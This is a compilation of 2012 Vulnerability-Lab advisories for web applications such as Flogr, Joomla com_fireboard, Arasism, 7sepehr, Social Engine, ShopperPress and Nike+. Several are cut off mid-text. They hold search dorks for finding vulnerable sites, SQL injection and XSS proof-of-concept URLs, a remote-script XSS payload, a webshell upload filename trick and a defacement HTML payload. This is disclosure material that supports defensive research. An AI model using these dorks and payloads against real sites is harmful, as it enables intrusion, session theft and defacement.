Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Flogr v2.5.6 v2.3 - Cross Site Script Vulnerabilities
Title: == Flogr v2.5.6 v2.3 - Cross Site Script Vulnerabilities Date: = 2012-07-11 References: === http://www.vulnerability-lab.com/get_content.php?id=656 VL-ID: = 656 Common Vulnerability Scoring System: 2 Introduction: = Flogr is a flexible script that displays your flickr photos in a customizable photo gallery you host on your website. If you use flickr but want to have a different look and feel for your photo gallery you may like flogr. Customizable photoblog interface for your flickr photos Display all flickr photos, only photos with certain tags or only certain photosets Displays photo details, EXIF data, tags, geo location, and photo comments Thumbnail viewer displays photos by date taken, photoset, and tag Embedded Slimbox photo slideshow Map view of your geo tagged photos Flickr tag cloud page RSS 2.0 support (Copy of the Vendor Homepage: https://code.google.com/p/flogr/ ) Abstract: = The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered mutliple non persistent Cross Site Scripting Vulnerabilities in the Flogr v2.5.6 v2.3 photo gallery CMS. Report-Timeline: 2012-07-11: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: Multiple non persistent cross site scripting vulnerabilities are detected in the Flogr v2.5.6 v2.3 photo gallery CMS. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with high required user inter action or local low privileged user account. The vulnerabilities are located in the recent.php index.php with the bound vulnerable tag parameter. Successful exploitation can result in account steal, phishing client-side content request manipulation. Vulnerable Module(s): [+] Recent Listing [+] Index Listing Vulnerable File(s): [+] Recent.php [+] Index.php Vulnerable Parameter(s): [+] Tag Proof of Concept: = Dork(s): inurl:tag= powered by flogr v2.3 inurl:tag= powered by flogr v2.5.6 inurl:tag= powered by flogr v1.7 PoC: http://[TARGET]/recent.php?tag=[CROSS SITE SCRIPTING] http://[TARGET]/index.php?tag=[CROSS SITE SCRIPTING] Reference(s): xxx.com/recent.php?tag=%22%3E%3Cscript%20src%3d//xxx.com/s%3E%3C/script%3E xxx.com/bigpictureproject/index.php?tag=script src%3d//xxx.com/s/script xxx.com/flogr/recent.php?tag=script src%3d//xxx.com/s/script xxx.com/recent.php?tag=%22%3E%3Cscript%20src%3d//xxx.com/s%3E%3C/script%3E Risk: = The security risk of the client side cross site scripting vulnerabilities are estimated as low(+)|(-)medium. Credits: Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242 Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific
Joomla com_fireboard - SQL Injection Vulnerability
Title: == Joomla com_fireboard - SQL Injection Vulnerability Date: = 2012-07-11 References: === http://www.vulnerability-lab.com/get_content.php?id=655 VL-ID: = 655 Common Vulnerability Scoring System: 7.3 Introduction: = Joomla is a free and open source content management system (CMS) for publishing content on the World Wide Web and intranets and a model–view–controller (MVC) Web application framework that can also be used independently. Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design patterns, stores data in a MySQL database, and includes features such as page caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support for language internationalization. Joomla had been downloaded 23 million times. Between March 2007 and February 2011 there had been more than 21 million downloads. As of November 2011, there are over 8,600 free and commercial extensions available from the official Joomla! Extension Directory and more available from other sources. (Copy of the Vendor Homepage: http://en.wikipedia.org/wiki/Joomla) Abstract: = The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered a SQL Injection Vulnerability in the com_fireboard module of the joomla CMS. Report-Timeline: 2012-07-11: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: A SQL Injection vulnerability is detected in the com_fireboard module of the joomla Content Management System. Remote attackers low privileged user accounts can execute/inject own sql commands to compromise the application dbms. The vulnerability is located in the com_fireboard module with the bound vulnerable func fb_ parameter. Successful exploitation of the vulnerability result in dbms (Server) or application (Web) compromise. Vulnerable Module(s): [+] index.php?option=com_fireboard Vulnerable Parameter(s): [+] func fb_ Proof of Concept: = The sql injection vulnerability can be exploited by remote attackers without user inter action with low privileged user account. For demonstration or reproduce ... Dork(s): inurl:id= intext:/com_fireboard/ PoC: http://[TARGET]/index.php?option=com_fireboardItemid=0id=1catid=0func=fb_pdf'[SQL-INJECTION] Reference(s): xxx.com/index.php?option=com_fireboardItemid=0id=1catid=5func=fb_pdf'[SQL-INJECTION] xxx.com/2012/index.php?option=com_fireboardItemid=79id=1catid=2func=fb_pdf'[SQL-INJECTION] xxx.com/fireboard/index.php?option=com_fireboardItemid=38id=22111catid=16func=fb_pdf'[SQL-INJECTION] xxx.com/board/index.php?option=com_fireboardItemid=54id=70122catid=12func=fb_pdf'[SQL-INJECTION] xxx.com/jmfireboard/index.php?option=com_fireboardItemid=54id=70122catid=12func=fb_pdf'[SQL-INJECTION] Risk: = The security risk of the remote sql injection vulnerability is estimated as high(+). Credits: Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242 Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other
Arasism (IR) CMS - File Upload Vulnerability
Title: == Arasism (IR) CMS - File Upload Vulnerability Date: = 2012-07-12 References: === http://www.vulnerability-lab.com/get_content.php?id=657 VL-ID: = 657 Common Vulnerability Scoring System: 6.5 Abstract: = The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered a File Upload Vulnerability in the Arasism CMS. Report-Timeline: 2012-07-12: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: A File Upload vulnerability is detected in the famous iranisch Arasism.com Content Management (Panel) System. The vulnerability allows an attacker (remote) with low privileged user account to bypass the picture upload validation when processing by including own .asp/.php files. Successful exploitation of the vulnerability result in malicious file uploads (malware or webshells) to compromise the application dbms application system. Vulnerable Path: [+] ../sysop/ Vulnerable File(s): [+] RTE_popup_file_atch.asp Proof of Concept: = The remote file upload vulnerability can be exploited by remote attacker without user inter action. For demonstration or reproduce ... Dork(s): Powered by Arasism.com Designed Powered By Hadi Farzad Powered By : www.Arasism.Com ØÑÇÍí æ ÇÌÑÇ : åÇÏí ÝÑÒÇÏ | íÔÇãÇä æÈ ÝÑÏÇ PoC: Path: ../sysop/ File: RTE_popup_file_atch.asp NOTE: To upload an asp web shell inject a filename with for example ... shell.asp;1.jpg Risk: = The security risk of the remote file upload vulnerability is estimated as high. Credits: Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242 Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Flynax General Classifieds v4.0 CMS - Multiple Vulnerabilities
=value input[NON PERSISTENT SCRIPT CODE] class=numeric field_from w50 type=text name=f[price][from] maxlength=15img alt= src=http://general.demoflynax.com/templates/general_modern/img/blank.gif; class=between /input value=iframe src=a class=numeric field_to w50 type=text name=f[price][to] maxlength=15 / /div URL: http://general.[SERVER]:1339/search.html Risk: = 1.1 The security risk of the remote sql injection vulnerability is estimated as critical. 1.2 The security risk of the persistent input validation vulnerabilities are estimated as medium(+). 1.3 The security risk of the non persistent cross site scripting vulnerabilities are estimated as low(+). Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
7sepehr CMS 2012 - Multiple SQL Injection Vulnerabilities
Title: == 7sepehr CMS 2012 - Multiple SQL Injection Vulnerabilities Date: = 2012-08-12 References: === http://www.vulnerability-lab.com/get_content.php?id=679 VL-ID: = 680 Common Vulnerability Scoring System: 8.3 Abstract: = The Laboratory Researcher (Nafsh) Ehram Shahmohamadi (sec-lab.ir) discovered multiple SQL Injection Vulnerabilities in the 7sepehr CMS. Report-Timeline: Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed [storm] (st...@vulnerability-lab.com) Status: Published Exploitation-Technique: === Remote Severity: = Critical Details: Multiple SQL Injection vulnerabilities are detected in the official 7sepehr.com Content Management System 2012. Remote attackers can execute/inject own sql commands to compromise the affected application dbms. The vulnerabilities are located in the news_detail, news_view and content asp modules with the bound vulnerable id parameter. Successful exploitation of the remote sql injection vulnerability result in dbmsor web application compromise. Vulnerable File(s): [+] news_Detail.asp [+] newsview.asp [+] contents.aspx Vulnerable Parameter(s): [+] id Proof of Concept: = The remote sql injection vulnerabilities can be exploited by remote attackers without privileged user account without required user inter action. For demonstration or reproduce ... Dork: `Powered by 7sepehr.com` PoC: http://127.0.0.1:1338/news/news_Detail.asp?id=-1 union all select [SQL INJECTION VULNERABILITY]-- http://127.0.0.1:1338/news/newsview.asp?id=-1 union all select [SQL INJECTION VULNERABILITY]-- http://127.0.0.1:1338/contents.aspx?id=-1 union all select [SQL INJECTION VULNERABILITY]-- Risk: = The security risk of the remote sql injection vulnerabilities are estimated as critical. Credits: Nafsh - Ehram Shahmohamadi - (resea...@sec-lab.ir) [www.sec-lab.ir] - TEAM K0242 Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Social Engine v4.2.5 - Multiple Web Vulnerabilities
Title: == Social Engine v4.2.5 - Multiple Web Vulnerabilities Date: = 2012-07-31 References: === http://www.vulnerability-lab.com/get_content.php?id=672 VL-ID: = 672 Common Vulnerability Scoring System: 3 Abstract: = A Laboratory Researcher [X-Cisadane] discovered multiple Web Vulnerabilities in the Social Engine v4.2.5 web application. Report-Timeline: 2012-07-31: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = Medium Details: 1.1 Multiple persistent input validation vulnerabilities are detected in the Social Engine v4.2.5 web application. The bug allows an attackers to implement/inject malicious script code on the application side (persistent). The persistent vulnerabilities are located in the add- new videos and classiefieds module with the bound vulnerable tag (keywords) parameter. Successful exploitation of the vulnerability can lead to persistent session hijacking (manager/admin) or stable (persistent) context manipulation. Exploitation requires low user inter action but a privileged user account. Vulnerable Module(s): [+] Add New Video [+] Add New Classfields Affected Module(s): [+] Videos Listing Page [+] Classfields Listing Page Vulnerable Parameter(s): [+] Tags (keywords) 1.2 A non persistent cross site scripting vulnerability is detected in the Social Engine v4.2.5 web application. The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high required user inter action or local low privileged user account. The bug is located in the signup (profile) module with the bound vulnerable name and address parameters. Successful exploitation can result in account steal, client side phishing client-side content request manipulation. Exploitation requires medium or high user inter action without privileged web application user account. Vulnerable Module(s): [+] Profile - Signup Vulnerable Parameter(s): [+] Name Address Proof of Concept: = 1.1 The persistent vulnerability can be exploited by remote attackers with low required user inter action low privileged application user account. For demonstration or reproduce ... - In the Post New Video Page (http://127.0.0.1:8080/videos/create) Information:Copy Paste persistent malicious script coe (js/html) into the Tags (keywords) field and save the context - In the Post New Classfields Listing Page (http://127.0.0.1:8080/classifieds/create) Information:Copy Paste persistent malicious script coe (js/html) into the Tags (keywords) field and save the context Picture : http://i47.tinypic.com/2ptcv29.png Picture : http://i50.tinypic.com/14soaci.png PoC: DIV align=left DIV id=Layer1 style=BORDER-RIGHT: #00 1px; BORDER-TOP: #00 1px; 1; LEFT: 1px; BORDER-LEFT: #00 1px; WIDTH: 1500px; BORDER-BOTTOM: #00 1px; POSITION: absolute; TOP: 0px; HEIGHT: 5000px; BACKGROUND-COLOR: #00; layer-background-color: #00 br /br / br center font face=Arial color=red size=4strongbrbrbrDefaced By : X-Cisadane br /center font face=Courier New color=#FF size=3centerGreetz To : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club and Winda Utari/center/font centerimg src=http://obnoxiousgamer.files.wordpress.com/2010/01/jollyroger.gif;/img/center centerfont face=arial size=3 color=#FF marquee behavior=alternate scrolldelay=100 style=width: 90%Please fix your hole! /li /ul /td /tr /table /div 1.2 The non persistent cross site scripting vulnerability can be exploited by remote attackers with medium or high required user inter action and without privileged user account. For demonstration or reproduce ... Information:Copy Paste cross site scripting (script code) into the Profile Address Field of the signup form URL:http://127.0.0.1:8080/signup Picture : http://i45.tinypic.com/v46iyd.png Picture : http://i49.tinypic.com/156e79h.png Risk: = 1.1 The security risk of the persistent web vulnerabilities are estimated as medium(+). 1.2 The security risk of the client side cross site scripting vulnerability is estimated as low(+). Credits: X-Cisadane Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental
ShopperPress v2.7 Wordpress - SQL Injection Vulnerability
Title: == ShopperPress v2.7 Wordpress - SQL Injection Vulnerability Date: = 2012-08-01 References: === http://www.vulnerability-lab.com/get_content.php?id=669 VL-ID: = 669 Common Vulnerability Scoring System: 6.1 Introduction: = ShopperPress is a Premium Wordpress theme with addon that transform Wordpress into a fully functionality online store with shopping cart functionality. ShopperPress is the ideal solution for anyone who wants to sell products services, digital downloads or affiliate products online, you can even setup a catalog website. ShopperPress has been designed and tested to make setup and store management easy. Suitable for users of all levels, ShopperPress makes running an online store enjoyable whilst giving you all the professional tools required.ShopperPress has been optimized for search engines helping your store quickly rank high in all major search engines.You can also add-on Wordpress SEO plugins to help you customize meta tags and page titles. ShopperPress can create online stores, affiliate stores and even catalog websites. Every copy of ShopperPress includes Amazon, Ebay and CSV import tools, 20+ payment gateways, 20+ store designs, shipping, tax, promotions, coupons, emails and lots more! ShopperPress includes 20+ different payment gateways allowing you to choose how your visitors pay for your products/services. We have integration for Paypal (standard and Pro), 2Checkout, Worldpay, eWay, Google Checkout, Authorize.net and lots more Built into ShopperPress are 20+ different store designs to choose from, all included free! Customizing your theme is quick and easy using the on/off display options found in the admin area with full support for plugins widgets. ShopperPress has a built in order management system allowing you to manage your orders. You can easily view your order history, export to CSV, view product, billing and shipping details as well as print off customer invoices. With ShopperPress you can create custom product options such as colors and sizes. You can create up to 6 different product values which will be passed with the product to checkout as well as allow members to upload files. [24/7 Customer Support]We work hard to ensure our customers are 100% satisfied with our product which is why we offer a 24/7 customer support services. (Copy of the Vendor Website: http://shopperpress.com ) Abstract: = The Vulnerability Laboratory Research Team discovered a SQL Injecction Vulnerability in the Shopperpress official Premium Wordpress Theme and Addon v2.7. Report-Timeline: 2012-08-01: Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: A SQL Injection vulnerability is detected in the Shopperpress official Premium Wordpress Theme and Addon v2.7. Remote attackers with privileged user accounts module access can execute/inject own sql commands to compromise the wordpress application dbms. The vulnerability is located in the listing modules with the bound vulnerable id parameter. Exploitation requires privileged user account or module access rights. Vulnerable Module(s): [+] Listing - [Edit] Vulnerable Parameter(s): [+] ID Proof of Concept: = The sql injection vulnerability can be exploited by a privileged wordpress user account without user inter action. For demonstration or reproduce ... PoC: http://shopperpress.127.0.0.1:38/wp-admin/admin.php?page=ordersid=5-261343282-1%27union select[SQL-INJECTION!]-- --- SQL Exception Logs --- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[SQL-INJECTION!]' GROUP BY order_id LIMIT 1' at line 1 on line: 80 Solution: = The vulnerability can be patched by parsing the id parameter of the edit functions in the addon module files. Risk: = The security risk of the sql injection vulnerability is estimated as high(-). Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so
ShopperPress v2.7 Wordpress - Cross Site Vulnerabilities
; color:#666;padding:5px; value=Search Files /form div class=clearfix/div form class=plain method=post name=orderform id=orderform input type=hidden name=deleteimages value=1 Review: Member Add/Edit Listing ul lia rel=premiumpress_tab1 href=# class=activeDetails/a/li lia href=# onclick=window.location.href='admin.php ?page=orderscid=5[CLIENT SIDE MALICIOUS SCRIPT CODE]) width=800Order History/a/li !--lia href=admin.php?page=membersSearch Results/a/li-- /ul /div div id=videobox1/div form method=post target=_self enctype=multipart/form-data input name=action type=hidden value=edit / input name=userdata[ID] type=hidden value=5[CLIENT SIDE MALICIOUS SCRIPT CODE]) / input type=hidden value= name=showThisTab id=showThisTab / div id=premiumpress_tab1 class=content Review: EMail Add/Edit div id=premiumpress_tab1 class=content form class=fields method=post target=_self enctype=multipart/form-data input name=action value=edit type=hidden input name=ID value= type=hidden[CLIENT SIDE MALICIOUS SCRIPT CODE];) width=800 input type=hidden name=form[email_type] value=email / fieldset div class=titlehh3Email Options/h3/div Solution: = The vulnerability can be patched by parsing the orders, id search web application parameters. Risk: = The security risk of the non persistent cross site scripting vulnerabilities are estimated as medium(-). Credits: Vulnerability Laboratory [Research Team] -Benjamin Kunz Mejri (b...@vulnerability-lab.com) Disclaimer: === The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains:www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact:ad...@vulnerability-lab.com - supp...@vulnerability-lab.com - resea...@vulnerability-lab.com Section:video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or supp...@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: resea...@vulnerability-lab.com
Nike+ Panel Mobile App - Multiple Web Vulnerabilities
Title: == Nike+ Panel Mobile App - Multiple Web Vulnerabilities Date: = 2012-08-01 References: === http://www.vulnerability-lab.com/get_content.php?id=663 VL-ID: = 663 Common Vulnerability Scoring System: 3.5 Introduction: = Das Nike+ FuelBand zeichnet deine täglichen Aktivitäten über einen im Sport getesteten dreiachsigen Beschleunigungsmesser auf. Dann rechnet es jede Bewegung in NikeFuel um. Das Nike+ FuelBand zeichnet Laufen, Gehen, Tanzen, Basketball und die Ergebnisse einer Vielzahl alltäglicher Aktivitäten auf. Außerdem kannst du die Ergebnisse mit einer motivierenden, mobilen Website synchronisieren. Also: Anlegen und loslegen. Wie aktiv möchtest du sein? Leg dein Tagesziel fest. Das Nike+ FuelBand misst deinen Fortschritt und zeigt ihn dir im Verlauf des Tages mit einer Farbanzeige von rot bis grün an. Wenn du in den grünen Bereich kommst, hast du dein Ziel erreicht. Mach aus jedem Tag ein neues Spiel. Brich Rekorde, erreiche neue Meilensteine und schalte besondere Errungenschaften frei. Reite auf einer Erfolgswelle und probiere, wie viele Tage in Folge du dein Tagesziel erreichst. (Copy of the Homepage: http://nikeplus.nike.com/plus/ ) A Nike+ FuelBand is required to use this app. You must have iOS 5.0 or above installed to use the Nike+ FuelBand app. Description A Nike+ FuelBand is required to use this app. You must have iOS 5.0 or above installed to use the Nike+ FuelBand app. Nike+ FuelBand measures your everyday activity and turns it into NikeFuel. It also tracks each step and calorie burned. The App talks to your Nike+ FuelBand, allowing you to see your progress on your mobile device and get the motivation you need to get moving. • Sync wirelessly, set your Daily Goal directly from the App and decide how much NikeFuel you want to earn that day. • Sync your Nike+ FuelBand throughout the day to track your NikeFuel and try to hit your Daily Goal. • See your daily activity breakdown and view your progress by week, month, oryear. • View your achievement celebrations and save your badges in your trophycase. Bragging optional. • Connect, compare and compete with your Facebook friends. See your daily and weekly NikeFuel totals on a social leaderboard. • Keep track of your streaks. See how many days in a row you can reach yourDaily Goal. • Keep track of your personal bests. Set your records and try to break them. • Get notified every time you earn a trophy, beat a record, or reach a milestone. • Manage your Nike+ profile and settings on the go. • Write about your day and keep a personal record of how you felt. See whatmakes you tick. • Share your NikeFuel and achievements with friends on Facebook and Twitter. Get cheered on and stay motivated. • Stay connected to the rest of the Nike+ community. • The app automatically sends all your information to your Nike+ profile online. • Nike+ FuelBand Device required. (Copy of the Homepage: http://itunes.apple.com/de/app/nike+-fuelband/id493325070?mt=8# ) Abstract: = Vulnerability-Lab Team discovered multiple Web Vulnerabilities in the Nike+ Control Panel fuelband mobile web application. Report-Timeline: 2012-04-06: Researcher Notification Coordination 2012-05-28: Vendor Notification 1 2012-06-09: Vendor Notification 2 2012-07-22: Vendor Notification 3 2012-08-01: Public or Non-Public Disclosure Status: Published Exploitation-Technique: === Remote Severity: = High Details: Multiple persistent input validation vulnerabilities are detected in the Nike+ Control Panel fuelband mobile web application. The bug allows an attackers to implement/inject malicious script code on the application side (persistent). The first persistent vulnerability is located in the profile username input with the bound vulnerable name normal_font listing. The persistent code get executed out of the mobile application username listing nike+ index panel username profile listing. The secound persistent vulnerability is located in the facebook friends module the bound vulnerable facebook friend name listing. The persistent code get executed out of the friends (management) when processing to add a user with malicious string in the facebook name. The third vulnerability is located in the nike+ search module for members and the bound vulnerable alt_header_font title listing. The 3rd vulnerability is located on client side of the application and gets executed when a register malicious username will be searched. By injecting any own script code directly without the existing user the code will be executed on client side of the search module. Successful exploitation of the vulnerability can lead to persistent session hijacking (manager/admin) or stable (persistent) context manipulation in mobile apps or panels via sync. Exploitation requires low user inter
ManageEngine OpStor v7.4 - Multiple Web Vulnerabilities
